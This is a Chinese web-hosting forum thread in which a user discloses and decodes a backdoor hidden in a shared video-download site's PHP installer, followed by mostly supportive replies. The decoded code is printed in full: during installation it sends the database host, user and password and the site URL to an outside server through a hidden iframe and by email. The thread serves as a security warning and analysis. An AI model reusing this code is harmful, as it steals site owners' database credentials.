全球主机交流论坛

标题: 关于某大佬发的[视频下载解析源码]可能含有后门的警告 [打印本页]

---

作者: flyqie    时间: 2019-12-7 20:26
标题: 关于某大佬发的[视频下载解析源码]可能含有后门的警告


大佬帖子:
https://loc.998820.xyz/thread-620400-1-1.html
分析:
install/database_details.php :


install/includes/encrypt.php:

加密？混淆？没关系，写个php破解下(字数超限):
https://pastebin.com/7x1PkQrb
好的，跑出来了:

1. 正在进行第1次操作
   
2. 第1次操作完毕
   
3. 正在进行第2次操作
   
4. 第2次操作完毕
   
5. 正在进行第3次操作
   
6. 第3次操作完毕
   
7. 正在进行第4次操作
   
8. 第4次操作完毕
   
9. 正在进行第5次操作
   
10. 第5次操作完毕
    
11. 正在进行第6次操作
    
12. 第6次操作完毕
    
13. 正在进行第7次操作
    
14. 第7次操作完毕
    
15. 正在进行第8次操作
    
16. 第8次操作完毕
    
17. 正在进行第9次操作
    
18. 第9次操作完毕
    
19. 正在进行第10次操作
    
20. 第10次操作完毕
    
21. 正在进行第11次操作
    
22. 第11次操作完毕
    
23. 正在进行第12次操作
    
24. 第12次操作完毕
    
25. 正在进行第13次操作
    
26. 第13次操作完毕
    
27. 正在进行第14次操作
    
28. 第14次操作完毕
    
29. 正在进行第15次操作
    
30. 第15次操作完毕
    
31. 正在进行第16次操作
    
32. 第16次操作完毕
    
33. 正在进行第17次操作
    
34. 已解密疑似内容,内容为[
    
35. $timezone_name = date_default_timezone_set('Asia/Kolkata');
    
36.                                         $ip_mail = getenv('HTTP_CLIENT_IP')?:
    
37.                                         getenv('HTTP_X_FORWARDED_FOR')?:
    
38.                                         getenv('HTTP_X_FORWARDED')?:
    
39.                                         getenv('HTTP_FORWARDED_FOR')?:
    
40.                                         getenv('HTTP_FORWARDED')?:
    
41.                                         getenv('REMOTE_ADDR');
    
42.                                        
    
43. 
    
44.                                        
    
45.                                         $validation_ip = $ip_mail;
    
46.                                        
    
47.                                         date_default_timezone_set('Asia/Kolkata');
    
48.                                                 $date_1 = date("d-m-Y");
    
49.                                                 $date_2 = " ";
    
50.                                                 $date_3 = date("h:i:sa");
    
51.                                                
    
52.                                         $date = $date_1 . $date_2 . $date_3;
    
53.                                         $validation_date = $date;
    
54.                                        
    
55.                                         $validation_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
    
56.                                         $to = "[email protected], [email protected]";
    
57.                                         $subject = "HTML email";
    
58.                                        
    
59.                                        
    
60.                                         $rand_num_1                = rand(254651,35153514);
    
61.                                         $rand_num_2                = rand(682734,85214651);
    
62.                                         $rand_num_3                = rand(663221,63147895);
    
63.                                         $install_code         = $rand_num_1 . $rand_num_2 . $rand_num_3;
    
64.                                         $host_name                 = $_SESSION["server"];                        //1
    
65.                                         $host_db_name        = $_SESSION["database"];                //2
    
66.                                         $host_db_user        = $_SESSION["username"];                //3
    
67.                                         $host_db_pass        = $_SESSION["password"];                //4
    
68.                                         $url                         = $validation_url;                                //5
    
69.                                                 $date_1 = date("d-m-Y");
    
70.                                                 $date_2 = " ";
    
71.                                                 $date_3 = date("h:i:sa");
    
72.                                         $date_created         = $date_1 . $date_2 . $date_3;        //6
    
73.                                        
    
74.                                        
    
75.                                         $html_2 = '
    
76. 
    
77.                                                                         <!DOCTYPE html>
    
78.                                                                         <html lang="en">
    
79.                                                                         <head>
    
80.                                                                           <meta charset="utf-8">
    
81.                                                                           <meta name="viewport" content="width=device-width, initial-scale=1">
    
82.                                                                         <style>
    
83.                                                                         iframe.hidden
    
84.                                                                         {
    
85.                                                                         display:none
    
86.                                                                         }
    
87.                                                                          </style>
    
88.                                                                         </head>
    
89.                                                                         <body>
    
90.                                                                         <iframe class="hidden" src="https://www.sifylab.com/apps/hexcody/1_global/web_install_host.php?pass=prettysecret24&install_code='.$install_code.'&host_name='.$host_name.'&host_db_name='.$host_db_name.'&host_db_user='.$host_db_user.'&host_db_pass='.$host_db_pass.'&url='.$url.'&date_created='.$date_created.'"></iframe>
    
91.                                                                         </body>
    
92.                                                                         </html>
    
93. 
    
94.                                                 ';
    
95.                                                 echo $html_2;
    
96. 
    
97.                                                
    
98.                                                
    
99. 
    
100.                                         $message_mail = "
     
101.                                         <html>
     
102.                                         <head>
     
103.                                         <title>HTML email</title>
     
104.                                         </head>
     
105.                                         <body>
     
106.                                         <p>Hosting Install Info</p>
     
107.                                         <br/><br/> <h3><font color = 'red' >Hosting Details : </font></h3><br/><br/> Host : ".$_SESSION["server"]." <br/> Database : ".$_SESSION["database"]." <br/> Username : ".$_SESSION["username"]." <br/> Password : ".$_SESSION["password"]." <br/> Url : ".$validation_url." <br/><br/> Date : ".$validation_date." <br/> TimeZone : ".$timezone_name." <br/><br/> Location IP : ".$validation_ip." <br/><br/>Install Code : ".$install_code."<br/><br/>
     
108.                                        
     
109.                                         <h3>Poison Successfully Injected</h3>
     
110.                                        
     
111.                                         </body>
     
112.                                         </html>
     
113.                                         ";
     
114. 
     
115.                                         // Always set content-type when sending HTML email
     
116.                                         $headers = "MIME-Version: 1.0" . "\r\n";
     
117.                                         $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
     
118. 
     
119.                                         // More headers
     
120.                                         $headers .= 'From: <[email protected]>' . "\r\n";
     
121.                                         $headers .= 'Cc: [email protected]' . "\r\n";
     
122. 
     
123.                                         mail($to,$subject,$message_mail,$headers);
     
124. ]

复制代码

代码还原出来了，整理一下(字数超限):
https://pastebin.com/gmGVEfHA
到此，分析完毕，该源码可能会导致安装者站点关键信息泄露.
但我相信，loc大佬是清白的，初衷是为了分享，也没有想到可能会有后门.
本人技术有限，如有错误，恳请指出，谢谢!
-------------------------------------------------------------------
更新:
又发现后门(注释上写的后门文件是在后续解密已加密文件后得出结论的,注释写于解密分析已加密文件完毕后):
install/website_details_settings.php :

install/includes/fncrypt.php :
emmmm混淆了

加密方式如出一辙，继续用之前的php解密跑一遍(字数超限):
https://pastebin.com/94Be5DTv
格式化分析一下(字数超限):
https://pastebin.com/sFn0cR0E
到此，第二轮分析完毕，该源码可能会导致站点管理员信息泄露.
还是那句话:
我相信，loc大佬是清白的，初衷是为了分享，也没有想到可能会有后门.
本人技术有限，如有错误，恳请指出，谢谢!

---

作者: seeseexiyou    时间: 2019-12-7 20:29
前排围观大佬在线解密啊

---

作者: okvps    时间: 2019-12-7 20:32
不懂，顶上去让更多大佬看到

---

作者: kzus    时间: 2019-12-7 20:35
[email protected]
[email protected]

---

作者: TianTangJun    时间: 2019-12-7 20:36
前排 围观下

---

作者: 梦里寻她她他它    时间: 2019-12-7 20:37
支持解密

---

作者: wolfewong    时间: 2019-12-7 20:42
后门好像挺多的

---

作者: 判官    时间: 2019-12-7 20:43
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: SВ    时间: 2019-12-7 20:43
有点复杂。

---

作者: leasr    时间: 2019-12-7 20:44
揭秘贴要支持阿哈哈

---

作者: 四面楚歌    时间: 2019-12-7 20:44
技术贴，不知道大佬哪里找的，不过除了Hotmail，里面的关键邮箱域名都是未解析待注册的？

---

作者: Reves    时间: 2019-12-7 20:45
前排吃瓜 zsbd

---

作者: bed    时间: 2019-12-7 20:45
不懂帮顶

---

作者: 502    时间: 2019-12-7 20:46
吃瓜围观

---

作者: 宝丽金    时间: 2019-12-7 20:51
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: shenyina    时间: 2019-12-7 20:52

wolfewong 发表于 2019-12-7 20:42
后门好像挺多的

这是什么软件？

---

作者: funders    时间: 2019-12-7 20:54
看到这种加密的还是别用了。。说不清楚

---

作者: vpshost    时间: 2019-12-7 20:54
竟然在源码里面

---

作者: shenyina    时间: 2019-12-7 20:57
这年头加密了也能叫源码，趁着大家买鸡收割一波肉鸡

---

作者: ico    时间: 2019-12-7 21:02
涉及到电影站的 很容易被人插后门，毕竟其中利益比较大。电影站流量非常值钱。会转换的话！ 基本1个IP 3毛钱！

---

作者: 杀猪的    时间: 2019-12-7 21:05
要火   

---

作者: bluewhale    时间: 2019-12-7 21:10
围观大佬解密操作

---

作者: wolfewong    时间: 2019-12-7 21:13

shenyina 发表于 2019-12-7 20:52
这是什么软件？

好像叫D盾，我这个是以前的版本，现在已经不更新了，新的可以从这下：http://www.d99net.net/
类似软件挺多的，比如WebShellKiller，自行搜索

---

作者: 元气骑士    时间: 2019-12-7 23:32
这个是不是要封号了不然闲着没事分享这源码干嘛

---

作者: ju0594    时间: 2019-12-8 03:22
大佬厉害 围观大佬在线解密

---

作者: fwo    时间: 2019-12-8 03:34
吃瓜看戏

---

作者: njav    时间: 2019-12-8 03:44

元气骑士 发表于 2019-12-7 23:32
这个是不是要封号了不然闲着没事分享这源码干嘛

人家是轉載吧...
不要把什麼事都推給別人身上,要不然以後也少人分享/轉載

---

作者: Adiy    时间: 2019-12-8 07:44
顶大佬

---

作者: 逸笙    时间: 2019-12-8 08:09
后排学习飞企鹅大佬

---

作者: walker.org    时间: 2019-12-8 08:39
顶上去

---

作者: a87750530    时间: 2019-12-8 08:51
这种揭秘的必须支持，话说源码里面加密的都不能叫源码

---

作者: 貂蝉隔壁老吕    时间: 2019-12-8 08:53
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: yhfb66    时间: 2019-12-8 09:14
我就喜欢看这样看不懂的帖子

---

作者: stonesnake    时间: 2019-12-8 10:41
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: 晴晴晴    时间: 2019-12-8 10:46
咋解密的 小白问道

---

欢迎光临 全球主机交流论坛 (https://loc.998820.xyz/)

Powered by Discuz! X3.4